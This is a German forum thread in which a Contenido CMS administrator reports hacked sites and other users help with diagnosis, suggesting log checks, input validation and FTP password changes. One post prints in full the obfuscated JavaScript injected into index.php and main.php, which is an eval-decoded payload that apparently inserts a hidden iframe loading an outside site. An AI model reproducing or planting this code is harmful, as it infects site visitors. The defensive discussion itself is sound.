Contenido 4.8.xx Angriff - gehackt

[sarronsarron]

Hallo,

heute wurden mehrere Accounts meiner Contenido Installationen bei 1und1gehackt. Versionen 4.8.xx
Ich weis nicht ob das woanders auch passiert.

Im Verzeichnis contenido wurden die beiden Dateien mail.php und index.php überschreiben (trotz Schreibschutz)

Einfach die beiden Dateien wieder herstellen und dann funktioniert es wieder.

Gruß sarronsarron

[sarronsarron]

Anscheinend wurde 4.8.14 und 4.8.15 gehackt.
Bei 1und1 und bei Strato.

Gruß sarronsarron

[xmurrix]

Kannst du mir bitte per PM die Apache Logs von dem Zeitraum zukommen lassen, in der der Hack maßgeblich stattgefunden hat?

Und natürlich auch die CONTENIDO Version, sowie Details über PHP, Apache, Betriebssystem?

Danke und Grüße
xmurrix

[Dodger77]

So, ich habe das mal verschoben, das sollte hier besser passen.

[timo.trautmann_4fb]

Diese Info hätte ich auch gerne per PM. Herzlichen Dank!

[xmurrix]

Danke nochmals für das Senden der Logs per PM, bis jetzt scheint es kein CONTENIDO Problem zu sein.

Bitte prüfe auch andere Scripte, sofern du welche hast und auch die verwendete PHP-Version.

Idealerweise sollte auch nicht die verwendete Version der Anwendungen (PHP, Apache, usw.) öffentlich gemacht werden, da man über die Versionsnummer sehr leicht die Schwachstellen preis gibt. In Apache und PHP kann man das Senden dieser Details unterbinden.

Gruß
xmurrix

[sarronsarron]

Bei mir sind alle Contenido Versionen betroffen.

In contenido/main.php und index.php wurde folgender Code an den Anfang kopiert.

<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n,12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script><?php

Gruß sarronsarron

[sarronsarron]

Hallo xmurrix,

shit, du hast Recht, es sind noch andere Dateien betroffen.
So wie es aussieht sind alle index.php Dateien betroffen aus CMS und Contenido.

CMS und Contenido läuft aber trotzdem.

Gruß sarronsarron

[xmurrix]

...In contenido/main.php und index.php wurde folgender Code an den Anfang kopiert...

Suche bitte in der Apache Log nach Einträgen, die eventuell diesen Code enthalten.

Prüfe auch Formularmodule, die per POST eingaben annehmen und/odr E-Mails versenden. Wenn man ankommende Daten nicht prüft, könnten diese schon Probleme verursachen. Aber wenn die contenido/main.php und die contenido/index.php geändert wurden, so hat das vermutlich nicht über die Webseite stattgefunden. PHP wird mit dem Account des Webservers gestartet, und alles was PHP macht, läuft mit dem Account des Webservers und dieser hat normalerweise keine Rechte, um diese PHP Scripte zu ändern.

[sarronsarron]

Hi,

den Eintrag habich in der Log Datei vom 24.1.13 nicht gefunden.
Post Variablen funktionieren

Gruß sarronsarron

[xmurrix]

...den Eintrag habich in der Log Datei vom 24.1.13 nicht gefunden...

Ok, die Scripte wurden auch am 24.01.13 geändert?
Falls ja, dann schau mal nach POST Requests in der Log-Datei, und Prüfe die Module der Seiten, an die der Post Request gegangen ist.

...Post Variablen funktionieren...

Meinst du damit, dass sie ankommen? Falls so, dann meinte ich das damit nicht, sondern eher das Prüfen dieser Werte auf ihre Inhalte, ich meine dass eine E-Mail Adresse auch wirklich eine E-Mail Adresse ist und dass Text auch nur Text enthält und kein Code, das am Ende irgendwie ausgeführt werden kann.

Bitte nicht falsch verstehn, ich versuche das Thema aus verschiedenen Punkten anzugehen, die Lücke kann überall sein, CONTENIDO, Module, Betriebssystem, PHP, Apache, usw...

[Spider IT]

Bei ein derartiges Problem würde ich als erstes mal sämtliche FTP-Kennwörter ändern und auf dem eigenen PC (und alle wo diese FTP-Zugänge genutzt werden) einen intensiven Viren- und Trojanerscan starten, denn oft wird über ein Trojaner die FTP-Zugangsdaten abgegriffen und dann für solche Änderungen genutzt.
Hinweise für solche FTP-Änderungen sucht man oft vergeblich, aber nach dem Ändern der Passwörter ist der Spuk meistens vorbei.

Gruß
René

[xmurrix]

Gibt es schon Neuigkeiten in dieser Sache?

Der Hinweis mit den FTP-Kennwörtern ist auch wichtig, man kann in den FTP-Logs sehen, ob da ein Zugriff (außer dem eigenen) auf den Server stattgefunden hat oder nicht...

[sarronsarron]

Hi,

hab noch nix mit den Log Files gemacht musste schaun das ich heute alle Projekte wieder auf eine vernünftigen Stand bringe uns alle FTP Passworter ändere.

Werd mich morgen darum kümmern.

Gruß sarronsarron

[xmurrix]

Viel Erfolg dabei!